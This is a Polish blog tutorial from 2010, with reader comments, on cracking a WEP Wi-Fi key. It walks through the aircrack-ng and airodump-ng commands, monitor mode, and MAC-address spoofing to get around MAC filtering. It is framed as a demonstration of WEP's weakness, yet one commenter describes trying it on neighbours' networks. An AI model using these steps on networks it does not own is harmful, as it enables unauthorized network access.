RSS

Łamanie klucza WEP

17 Maj

Wpis ten ma na celu pokazanie słabości zabezpieczania sieci wifi kluczem WEP. Mam nadzieję, że niektórych przekona do zmiany szyfrowania na lepsze.
W celu złamania klucza będziemy potrzebowali Linuksa(Ubuntu), bezprzewodowej karty sieciowej oraz odrobiny wolnego czasu ;] Zebranie kilkudziesięciu tysięcy pakietów danych będzie trochę trwało.

1. Instalujemy pakiet aircrack-ng
$ sudo -i
# apt-get update
# apt-get install aircrack-ng

2. Przełączamy kartę sieciową w tryb monitor
Sprawdzamy jak nazywa się nasza karta w systemie :
# ifconfig

eth0 Link encap:Ethernet HWaddr 00:08:54:54:**:**
inet addr:192.168.0.2 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2567 errors:0 dropped:0 overruns:0 frame:0
TX packets:2519 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1973053 (1.9 MB) TX bytes:400436 (400.4 KB)
Interrupt:16 Base address:0xe800

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2 errors:0 dropped:0 overruns:0 frame:0
TX packets:2 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:100 (100.0 B) TX bytes:100 (100.0 B)

wlan0 Link encap:UNSPEC HWaddr 00-18-F3-EE-**-**
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3248 (3.2 KB) TX bytes:1800 (1.8 KB)

Wyłączamy kartę sieciową i zmieniamy jej tryb na monitor:
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up

3. Zaczynamy zbierać pakiety
# airodump-ng wlan0 -w zzrzut.log
Jeżeli znamy kanał na jakim działa interesująca nas sieć to możemy sprecyzować to poleceniem :
# airodump-ng wlan0 -w zzrzut.log --channel 2

BSSID – adresy MAC AP w pobliżu
Beacons – pakiety kontrolne, zbędna dla nas
Data – pakiety danych
CH – kanał na których AP nadają
ENC – sposoby zabezpieczeń
ESSID – to nazwa danej sieci
MB – prędkość z jaką działa sieć
STATION – adres MAC klienta podłączonego do danej sieci. Może się przydać w sytuacji gdy będzie ustawione filtrowanie po MAC adresach.

Żeby złamać klucz WEP 128bit trzeba złapać ok 80-120tyś pakietów DATA.

4. Wracamy do normalnego trybu karty
# ifconfig wlan0 down
# iwconfig wlan0 mode managet
# ifconfig wlan0 up

Jeżeli wiemy, że dostęp do sieci jest dodatkowo zabezpieczony filtrowaniem po MAC adresach możemy łatwo zmienić nasz MAC na dowolny :
Zanim podniesiemy interfejs wpisujemy :
# ifconfig wlan0 hw ether 00:08:c1:3a:6a:77
Dopiero potem podnosimy naszą kartę :
# ifconfig wlan0 up

5. Zdobywamy hasło.
W tym celu posłużymy się programem aircrack-ng
# aircrack-ng -n 128 zzrzut.log-01.cap
Objaśnienie :
-n 128 – określamy jaki klucz chcemy złamać
zzrzut.log-01.cap – plik ze zrzutem z programu airodump-ng

Może odpalić drugą konsolę i co jakiś czas sprawdzać czy zebrana ilość danych starczy do odszyfrowania hasła. Nie musimy wtedy nawet przerywać pracy programu airodump-ng.


W moim przypadku wystarczyło zdobyć tylko 50tyś pakietów danych ale i tak zajęło to 44minuty. Fakt, że użyłem proste hasło i specjalnie generowałem ogromny ruch miało duży wpływ na szybkość zebrania danych.

6. Łączymy się z siecią.
Gdy znamy hasło pozostaje nam już tylko ustanowić połączenie przy pomocy NetworkManager’a.

Advertisements
 
6 komentarzy

Opublikował/a w dniu Maj 17, 2010 w internet, linuks, Linux

 

Tagi:

6 responses to “Łamanie klucza WEP

  1. k0

    Maj 18, 2010 at 7:13 pm

    Mam pytanko w którym miejscu zapisują się te logi?

     
  2. lazowski

    Maj 19, 2010 at 7:39 am

    W tym miejscu gdzie masz odpaloną konsolę..

    po wydaniu komendy „sudo -i” pewnie będzie to /root/

     
  3. Data

    Sierpień 3, 2010 at 4:41 pm

    Po jakim czasie od odpalenia aircracka zaczyna byc zbierana „data”? Niestety zbieraja pakiety danych (data) trwalo to 4 godziny nie zebralem ani jednego. A probowalem na paru dostepnych sieciach. Jak to mozliwe, od czego to zalezy ?

     
  4. darf

    Wrzesień 9, 2010 at 12:46 pm

    Najprawdopodobniej koles hula na kablu lub nie masz dostatecznego zasiegu do jego karty bezprzewodowej.

     
  5. Data

    Wrzesień 10, 2010 at 12:01 pm

    jak koles hula na kablu i jak nie mam zasiegu jak z tego samego zalozmy bloku lacze sie czasami z internetem bez hasla ? A jest tam duzo lacz wireless i zadna nie pobiera data ? Cos mnie sie nie chce wierzyc, zeby tak bylo

     
  6. lol

    Czerwiec 28, 2011 at 10:15 am

    gosciu ale nie okresliles ze mieszkasz w gettcie… a komentarz poprzednika jak najbardziej opisywal zaistniala sytuacje. idac dalej zdecyduj sie czy masz w bloku tylko otwarte sieci czy takze zabezpieczone bo jezeli tylko to pierwsze to dalej jedz po osobach pomagajacych.

     

Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Log Out / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Log Out / Zmień )

Facebook photo

Komentujesz korzystając z konta Facebook. Log Out / Zmień )

Google+ photo

Komentujesz korzystając z konta Google+. Log Out / Zmień )

Connecting to %s

 
%d blogerów lubi to: